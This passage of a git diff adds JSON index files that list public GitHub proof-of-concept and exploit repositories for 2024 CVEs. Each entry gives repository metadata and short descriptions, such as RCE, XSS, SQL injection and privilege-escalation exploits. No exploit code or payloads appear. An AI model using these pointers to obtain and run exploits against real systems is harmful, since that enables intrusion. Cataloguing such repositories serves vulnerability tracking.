"cve-2024-37081", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826394284, + "name": "CVE-2024-37081", + "full_name": "Mr-r00t11\/CVE-2024-37081", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-37081", + "description": null, + "fork": false, + "created_at": "2024-07-09T16:14:41Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-07-09T16:22:15Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 54, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 831660859, + "name": "-CVE-2024-37081-POC", + "full_name": "CERTologists\/-CVE-2024-37081-POC", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/-CVE-2024-37081-POC", + "description": null, + "fork": false, + "created_at": "2024-07-21T08:41:40Z", + "updated_at": "2024-07-21T08:41:40Z", + "pushed_at": "2024-07-21T08:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831661049, + "name": "Modified-CVE-2024-37081-POC", + "full_name": "CERTologists\/Modified-CVE-2024-37081-POC", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/Modified-CVE-2024-37081-POC", + "description": null, + "fork": false, + "created_at": "2024-07-21T08:42:23Z", + "updated_at": "2024-07-21T08:48:29Z", + "pushed_at": "2024-07-21T08:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37084.json b/2024/CVE-2024-37084.json new file mode 100644 index 0000000000..a24539dc4a --- /dev/null +++ b/2024/CVE-2024-37084.json @@ -0,0 +1,162 @@ +[ + { + "id": 855311249, + "name": "CVE-2024-37084-Poc", + "full_name": "Kayiyan\/CVE-2024-37084-Poc", + "owner": { + "login": "Kayiyan", + "id": 126185640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126185640?v=4", + "html_url": "https:\/\/github.com\/Kayiyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kayiyan\/CVE-2024-37084-Poc", + "description": "Analysis , Demo exploit and poc about CVE-2024-37084", + "fork": false, + "created_at": "2024-09-10T16:58:54Z", + "updated_at": "2024-11-20T18:27:41Z", + "pushed_at": "2024-09-24T02:41:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855821849, + "name": "CVE-2024-37084", + "full_name": "vuhz\/CVE-2024-37084", + "owner": { + "login": "vuhz", + "id": 90823042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90823042?v=4", + "html_url": "https:\/\/github.com\/vuhz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vuhz\/CVE-2024-37084", + "description": "Spring Cloud Remote Code Execution", + "fork": false, + "created_at": "2024-09-11T14:09:50Z", + "updated_at": "2024-09-13T03:21:50Z", + "pushed_at": "2024-09-11T14:12:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872838076, + "name": "CVE-2024-37084-Exp", + "full_name": "Ly4j\/CVE-2024-37084-Exp", + "owner": { + "login": "Ly4j", + "id": 73785589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73785589?v=4", + "html_url": "https:\/\/github.com\/Ly4j", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ly4j\/CVE-2024-37084-Exp", + "description": "Spring Cloud Data Flow CVE-2024-37084 exp", + "fork": false, + "created_at": "2024-10-15T06:55:05Z", + "updated_at": "2024-10-16T02:27:56Z", + "pushed_at": "2024-10-16T02:27:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873195770, + "name": "CVE-2024-37084-Exp", + "full_name": "A0be\/CVE-2024-37084-Exp", + "owner": { + "login": "A0be", + "id": 184107161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184107161?v=4", + "html_url": "https:\/\/github.com\/A0be", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A0be\/CVE-2024-37084-Exp", + "description": "Spring Cloud Data Flow CVE-2024-37084 exp", + "fork": false, + "created_at": "2024-10-15T18:54:25Z", + "updated_at": "2024-10-15T19:09:22Z", + "pushed_at": "2024-10-15T18:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892641642, + "name": "cve-2024-37084-Poc", + "full_name": "XiaomingX\/cve-2024-37084-Poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-37084-Poc", + "description": "CVE-2024-37084是Spring Cloud Data Flow中的一个高危漏洞,影响版本为2.11.0至2.11.3。该漏洞允许具有Skipper服务器API访问权限的攻击者通过精心构造的上传请求,将任意文件写入服务器文件系统的任意位置,进而可能导致远程代码执行,严重威胁服务器安全。", + "fork": false, + "created_at": "2024-11-22T13:53:42Z", + "updated_at": "2024-12-08T18:37:26Z", + "pushed_at": "2024-11-22T14:02:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37085.json b/2024/CVE-2024-37085.json new file mode 100644 index 0000000000..aff7287b08 --- /dev/null +++ b/2024/CVE-2024-37085.json @@ -0,0 +1,126 @@ +[ + { + "id": 837225608, + "name": "CVE-2024-37085", + "full_name": "mahmutaymahmutay\/CVE-2024-37085", + "owner": { + "login": "mahmutaymahmutay", + "id": 171496549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171496549?v=4", + "html_url": "https:\/\/github.com\/mahmutaymahmutay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mahmutaymahmutay\/CVE-2024-37085", + "description": "Vulnerability Scanner for CVE-2024-37085 and Exploits ( For Educational Purpose only)", + "fork": false, + "created_at": "2024-08-02T13:31:59Z", + "updated_at": "2024-09-02T19:21:10Z", + "pushed_at": "2024-08-02T13:45:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838984689, + "name": "CVE-2024-37085-RCE-POC", + "full_name": "Florian-Hoth\/CVE-2024-37085-RCE-POC", + "owner": { + "login": "Florian-Hoth", + "id": 177672507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177672507?v=4", + "html_url": "https:\/\/github.com\/Florian-Hoth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Florian-Hoth\/CVE-2024-37085-RCE-POC", + "description": "CVE-2024-37085 VMware ESXi RCE Vulnerability", + "fork": false, + "created_at": "2024-08-06T18:23:43Z", + "updated_at": "2025-01-02T22:34:34Z", + "pushed_at": "2024-08-06T18:25:19Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841585434, + "name": "Vmware-ESXI", + "full_name": "WTN-arny\/Vmware-ESXI", + "owner": { + "login": "WTN-arny", + "id": 178199794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178199794?v=4", + "html_url": "https:\/\/github.com\/WTN-arny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WTN-arny\/Vmware-ESXI", + "description": "CVE-2024-37085 unauthenticated shell upload to full administrator on domain-joined esxi hypervisors.", + "fork": false, + "created_at": "2024-08-12T17:44:17Z", + "updated_at": "2024-08-12T17:47:43Z", + "pushed_at": "2024-08-12T17:47:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844208301, + "name": "CVE-2024-37085", + "full_name": "WTN-arny\/CVE-2024-37085", + "owner": { + "login": "WTN-arny", + "id": 178199794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178199794?v=4", + "html_url": "https:\/\/github.com\/WTN-arny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WTN-arny\/CVE-2024-37085", + "description": null, + "fork": false, + "created_at": "2024-08-18T17:48:34Z", + "updated_at": "2024-08-18T17:49:21Z", + "pushed_at": "2024-08-18T17:49:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37147.json b/2024/CVE-2024-37147.json new file mode 100644 index 0000000000..a483c314c1 --- /dev/null +++ b/2024/CVE-2024-37147.json @@ -0,0 +1,33 @@ +[ + { + "id": 827270291, + "name": "CVE-2024-37147-PoC", + "full_name": "0xmupa\/CVE-2024-37147-PoC", + "owner": { + "login": "0xmupa", + "id": 61334200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61334200?v=4", + "html_url": "https:\/\/github.com\/0xmupa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmupa\/CVE-2024-37147-PoC", + "description": null, + "fork": false, + "created_at": "2024-07-11T10:20:00Z", + "updated_at": "2024-07-11T10:20:14Z", + "pushed_at": "2024-07-11T10:20:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37383.json b/2024/CVE-2024-37383.json new file mode 100644 index 0000000000..9a9e5f6139 --- /dev/null +++ b/2024/CVE-2024-37383.json @@ -0,0 +1,64 @@ +[ + { + "id": 877680662, + "name": "CVE-2024-37383-POC", + "full_name": "bartfroklage\/CVE-2024-37383-POC", + "owner": { + "login": "bartfroklage", + "id": 4425568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4425568?v=4", + "html_url": "https:\/\/github.com\/bartfroklage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bartfroklage\/CVE-2024-37383-POC", + "description": "Proof of concept for CVE-2024-37383", + "fork": false, + "created_at": "2024-10-24T04:01:03Z", + "updated_at": "2024-12-10T07:33:20Z", + "pushed_at": "2024-10-24T05:48:34Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 882582274, + "name": "CVE-2024-37383-exploit", + "full_name": "amirzargham\/CVE-2024-37383-exploit", + "owner": { + "login": "amirzargham", + "id": 133110721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4", + "html_url": "https:\/\/github.com\/amirzargham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amirzargham\/CVE-2024-37383-exploit", + "description": "Roundcube mail server exploit for CVE-2024-37383 (Stored XSS)", + "fork": false, + "created_at": "2024-11-03T07:16:46Z", + "updated_at": "2024-12-07T12:59:05Z", + "pushed_at": "2024-12-07T12:59:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37393.json b/2024/CVE-2024-37393.json new file mode 100644 index 0000000000..db837f0649 --- /dev/null +++ b/2024/CVE-2024-37393.json @@ -0,0 +1,33 @@ +[ + { + "id": 813073392, + "name": "securenvoy-cve-2024-37393", + "full_name": "noways-io\/securenvoy-cve-2024-37393", + "owner": { + "login": "noways-io", + "id": 160848410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160848410?v=4", + "html_url": "https:\/\/github.com\/noways-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noways-io\/securenvoy-cve-2024-37393", + "description": "Vulnerability check script for CVE-2024-37393 (SecurEnvoy MFA 9.4.513)", + "fork": false, + "created_at": "2024-06-10T12:42:57Z", + "updated_at": "2024-06-20T02:01:22Z", + "pushed_at": "2024-06-10T13:43:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37726.json b/2024/CVE-2024-37726.json new file mode 100644 index 0000000000..5e43bd8fdd --- /dev/null +++ b/2024/CVE-2024-37726.json @@ -0,0 +1,64 @@ +[ + { + "id": 823516489, + "name": "CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "full_name": "carsonchan12345\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "owner": { + "login": "carsonchan12345", + "id": 44266907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44266907?v=4", + "html_url": "https:\/\/github.com\/carsonchan12345", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carsonchan12345\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "description": null, + "fork": false, + "created_at": "2024-07-03T07:26:07Z", + "updated_at": "2024-11-29T12:26:26Z", + "pushed_at": "2024-11-29T12:26:22Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 33, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 825258239, + "name": "CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "full_name": "NextGenPentesters\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "owner": { + "login": "NextGenPentesters", + "id": 169174200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169174200?v=4", + "html_url": "https:\/\/github.com\/NextGenPentesters", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NextGenPentesters\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "description": null, + "fork": false, + "created_at": "2024-07-07T09:21:21Z", + "updated_at": "2024-07-07T09:25:56Z", + "pushed_at": "2024-07-07T09:25:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37742.json b/2024/CVE-2024-37742.json new file mode 100644 index 0000000000..47d4118bf3 --- /dev/null +++ b/2024/CVE-2024-37742.json @@ -0,0 +1,33 @@ +[ + { + "id": 817975765, + "name": "CVE-2024-37742", + "full_name": "cha0sk3rn3l\/CVE-2024-37742", + "owner": { + "login": "cha0sk3rn3l", + "id": 151763816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151763816?v=4", + "html_url": "https:\/\/github.com\/cha0sk3rn3l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cha0sk3rn3l\/CVE-2024-37742", + "description": "This repository contains a PoC for exploiting CVE-2024-37742, a vulnerability in Safe Exam Browser (SEB) ≤ 3.5.0 on Windows. The vulnerability enables unauthorized clipboard data sharing between SEB's kiosk mode and the underlying system, compromising the integrity of exams.", + "fork": false, + "created_at": "2024-06-20T21:01:28Z", + "updated_at": "2024-06-24T08:36:55Z", + "pushed_at": "2024-06-23T00:16:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37759.json b/2024/CVE-2024-37759.json new file mode 100644 index 0000000000..9fa38070f0 --- /dev/null +++ b/2024/CVE-2024-37759.json @@ -0,0 +1,33 @@ +[ + { + "id": 818063757, + "name": "CVE-2024-37759_PoC", + "full_name": "crumbledwall\/CVE-2024-37759_PoC", + "owner": { + "login": "crumbledwall", + "id": 44513103, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44513103?v=4", + "html_url": "https:\/\/github.com\/crumbledwall", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crumbledwall\/CVE-2024-37759_PoC", + "description": "PoC of CVE-2024-37759", + "fork": false, + "created_at": "2024-06-21T02:58:40Z", + "updated_at": "2024-11-08T09:40:22Z", + "pushed_at": "2024-06-23T15:00:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37762.json b/2024/CVE-2024-37762.json new file mode 100644 index 0000000000..eaa83c8d3c --- /dev/null +++ b/2024/CVE-2024-37762.json @@ -0,0 +1,33 @@ +[ + { + "id": 822535716, + "name": "cve-2024-37762", + "full_name": "Atreb92\/cve-2024-37762", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37762", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:28:56Z", + "updated_at": "2024-08-04T09:52:47Z", + "pushed_at": "2024-07-01T10:33:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37763.json b/2024/CVE-2024-37763.json new file mode 100644 index 0000000000..54688e1661 --- /dev/null +++ b/2024/CVE-2024-37763.json @@ -0,0 +1,33 @@ +[ + { + "id": 822538828, + "name": "cve-2024-37763", + "full_name": "Atreb92\/cve-2024-37763", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37763", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:35:51Z", + "updated_at": "2024-08-04T09:55:59Z", + "pushed_at": "2024-07-01T10:36:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37764.json b/2024/CVE-2024-37764.json new file mode 100644 index 0000000000..69491191c9 --- /dev/null +++ b/2024/CVE-2024-37764.json @@ -0,0 +1,33 @@ +[ + { + "id": 822539510, + "name": "cve-2024-37764", + "full_name": "Atreb92\/cve-2024-37764", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37764", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:37:21Z", + "updated_at": "2024-08-04T09:56:02Z", + "pushed_at": "2024-07-01T10:38:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37765.json b/2024/CVE-2024-37765.json new file mode 100644 index 0000000000..e3d132fc9c --- /dev/null +++ b/2024/CVE-2024-37765.json @@ -0,0 +1,33 @@ +[ + { + "id": 822540396, + "name": "cve-2024-37765", + "full_name": "Atreb92\/cve-2024-37765", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37765", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:39:40Z", + "updated_at": "2024-08-04T09:52:45Z", + "pushed_at": "2024-07-01T10:42:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37770.json b/2024/CVE-2024-37770.json new file mode 100644 index 0000000000..d5d93004e7 --- /dev/null +++ b/2024/CVE-2024-37770.json @@ -0,0 +1,33 @@ +[ + { + "id": 824660920, + "name": "CVE-2024-37770", + "full_name": "k3ppf0r\/CVE-2024-37770", + "owner": { + "login": "k3ppf0r", + "id": 63085409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63085409?v=4", + "html_url": "https:\/\/github.com\/k3ppf0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3ppf0r\/CVE-2024-37770", + "description": "CVE-2024-37770", + "fork": false, + "created_at": "2024-07-05T16:13:34Z", + "updated_at": "2024-07-22T06:49:45Z", + "pushed_at": "2024-07-09T07:21:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37791.json b/2024/CVE-2024-37791.json new file mode 100644 index 0000000000..c5cb9ecad4 --- /dev/null +++ b/2024/CVE-2024-37791.json @@ -0,0 +1,33 @@ +[ + { + "id": 817225951, + "name": "CVE-2024-37791", + "full_name": "czheisenberg\/CVE-2024-37791", + "owner": { + "login": "czheisenberg", + "id": 52897817, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52897817?v=4", + "html_url": "https:\/\/github.com\/czheisenberg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/czheisenberg\/CVE-2024-37791", + "description": "我的CVE-2024-37791", + "fork": false, + "created_at": "2024-06-19T09:16:30Z", + "updated_at": "2024-07-03T08:10:57Z", + "pushed_at": "2024-06-19T10:01:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37843.json b/2024/CVE-2024-37843.json new file mode 100644 index 0000000000..da1ed86162 --- /dev/null +++ b/2024/CVE-2024-37843.json @@ -0,0 +1,33 @@ +[ + { + "id": 816569374, + "name": "CVE-2024-37843-POC", + "full_name": "gsmith257-cyber\/CVE-2024-37843-POC", + "owner": { + "login": "gsmith257-cyber", + "id": 55564824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55564824?v=4", + "html_url": "https:\/\/github.com\/gsmith257-cyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gsmith257-cyber\/CVE-2024-37843-POC", + "description": "POC for CVE-2024-37843. Craft CMS time-based blind SQLi", + "fork": false, + "created_at": "2024-06-18T02:27:04Z", + "updated_at": "2024-11-13T08:51:10Z", + "pushed_at": "2024-06-18T04:20:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37888.json b/2024/CVE-2024-37888.json new file mode 100644 index 0000000000..ca69264c43 --- /dev/null +++ b/2024/CVE-2024-37888.json @@ -0,0 +1,50 @@ +[ + { + "id": 812924226, + "name": "CVE-2024-37888", + "full_name": "7Ragnarok7\/CVE-2024-37888", + "owner": { + "login": "7Ragnarok7", + "id": 35977703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35977703?v=4", + "html_url": "https:\/\/github.com\/7Ragnarok7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7Ragnarok7\/CVE-2024-37888", + "description": "XSS PoC\/Exploit for Open Link Plugin for CKEditor 4", + "fork": false, + "created_at": "2024-06-10T07:00:18Z", + "updated_at": "2024-08-27T19:12:43Z", + "pushed_at": "2024-06-20T08:40:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "7ragnarok7", + "ckeditor", + "cve", + "cve-2024-37888", + "cybersecurity", + "exploit", + "github", + "hack", + "hacking", + "openlink", + "opensource", + "poc", + "public", + "security", + "vulnerability", + "xss" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37889.json b/2024/CVE-2024-37889.json new file mode 100644 index 0000000000..e709bb7d02 --- /dev/null +++ b/2024/CVE-2024-37889.json @@ -0,0 +1,33 @@ +[ + { + "id": 816119624, + "name": "CVE-2024-37889", + "full_name": "uname-s\/CVE-2024-37889", + "owner": { + "login": "uname-s", + "id": 94480739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94480739?v=4", + "html_url": "https:\/\/github.com\/uname-s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uname-s\/CVE-2024-37889", + "description": null, + "fork": false, + "created_at": "2024-06-17T04:50:00Z", + "updated_at": "2024-06-17T05:36:53Z", + "pushed_at": "2024-06-17T05:36:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38036.json b/2024/CVE-2024-38036.json new file mode 100644 index 0000000000..19a4505fe8 --- /dev/null +++ b/2024/CVE-2024-38036.json @@ -0,0 +1,33 @@ +[ + { + "id": 843195399, + "name": "CVE-2024-38036", + "full_name": "hnytgl\/CVE-2024-38036", + "owner": { + "login": "hnytgl", + "id": 26022152, + 